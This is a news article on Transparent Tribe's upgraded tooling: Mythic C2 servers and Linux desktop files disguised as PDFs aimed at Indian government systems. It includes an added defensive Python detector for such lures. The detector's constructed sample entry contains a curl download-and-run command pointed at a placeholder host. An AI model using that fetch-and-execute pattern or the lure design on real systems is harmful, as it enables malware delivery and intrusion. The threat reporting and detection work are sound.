Transparent Tribe APT acquired new malicious upgrades

October 8, 2024

The advanced persistent threat group Transparent Tribe has upgraded its malicious arsenal for its cybercriminal operations.

According to reports, the APT group has obtained new tactics that use the Mythic Poseidon binaries, hostile Linux desktop files, and a command-and-control infrastructure. Moreover, the researchers reveal that the group relies on 15 malicious hosts, most of which are DigitalOcean hosts, to control its operations.

The hosts are part of a Mythic C2 infrastructure. Mythic is a post-exploitation framework built for red teaming that threat actors, including Transparent Tribe, widely abuse.

Transparent Tribe has upgraded its tactics significantly.

According to the investigation, these discoveries point to a significant upgrade of the Transparent Tribe group’s overall capabilities. These upgrades, especially the use of Linux desktop entry files, pose a threat to users in India.

Transparent Tribe’s deployment of these customised payloads, including the Mythic Poseidon binaries, demonstrates the group’s prioritisation of exploiting Linux-based systems. This transition in targeting Linux environments is most likely due to the prevalence of the Debian-based BOSS OS in Indian government institutions and the introduction of Maya OS.

The researchers also revealed that they used JARM fingerprinting and HTML metadata analysis to identify 15 servers running the Mythic C2 framework.

One of the key detected servers became the APT’s focal point, indicating a more extensive network of hosts. Furthermore, Transparent Tribe uses the Mythic framework to manipulate infected systems remotely, even though it was initially designed for legitimate pen testing. This infrastructure allows the group to establish persistence in infected devices.

The investigation also highlighted Transparent Tribe’s novel use of Linux desktop entry files masquerading as PDFs as an attack vector. Once targets open these files, they trigger harmful behaviour, such as downloading and launching programs from remote servers.
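One defensive check the lure technique described above invites, as an added example that is not from the article or the researchers’ tooling: a small Python heuristic that parses a Linux desktop entry and flags entries whose Name or Icon present a document while the Exec line runs an inline shell command that fetches remote content. The sample entry, its file name and its URL are constructed for illustration.

```python
import re

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash", "zsh"}

def parse_desktop_entry(text):
    """Return the key/value pairs of the [Desktop Entry] group."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def suspicious_indicators(entry):
    """List the reasons an entry looks like a document lure that runs code."""
    reasons = []
    name, icon = entry.get("Name", ""), entry.get("Icon", "").lower()
    exec_line = entry.get("Exec", "")
    # Split on whitespace, quotes and shell separators so the words inside a
    # `bash -c "..."` string are inspected too; keep only path basenames.
    tokens = re.findall(r"[^\s;|&\"']+", exec_line)
    words = {t.rsplit("/", 1)[-1] for t in tokens}
    if re.search(r"\.(pdf|docx?|xlsx?)$", name, re.I) or "pdf" in icon:
        reasons.append("document-like Name or Icon")
    if words & SHELLS and "-c" in tokens:
        reasons.append("Exec runs an inline shell command")
    if words & DOWNLOADERS or re.search(r"https?://", exec_line):
        reasons.append("Exec fetches remote content")
    if len(reasons) > 1 and entry.get("Terminal", "false").lower() == "false":
        reasons.append("Terminal=false hides the command from the user")
    return reasons

def scan(text):
    """Parse the text of a .desktop file and return its suspicious indicators."""
    return suspicious_indicators(parse_desktop_entry(text))

# Constructed lure (not a captured sample): poses as a PDF, fetches and runs a binary.
LURE = """[Desktop Entry]
Name=Briefing.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://example.invalid/p -o /tmp/p && chmod +x /tmp/p && /tmp/p"
"""
```

A benign entry such as a text editor launched with `gedit %U` produces no indicators, so the heuristic can be run across `~/.local/share/applications` and `~/Desktop` to surface entries worth a closer look.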

The latest revelation of these new Transparent Tribe upgrades, especially the C2 infrastructure, demonstrates the APT group’s growth and sophistication when targeting Indian government sectors.

The group’s upgraded toolbox for cyber espionage operations has become more dangerous now that it uses Mythic C2 and distributes malicious Linux binaries. Organisations, particularly those in vital Indian sectors that run Linux-based systems, must therefore be wary of Transparent Tribe’s new tactics.
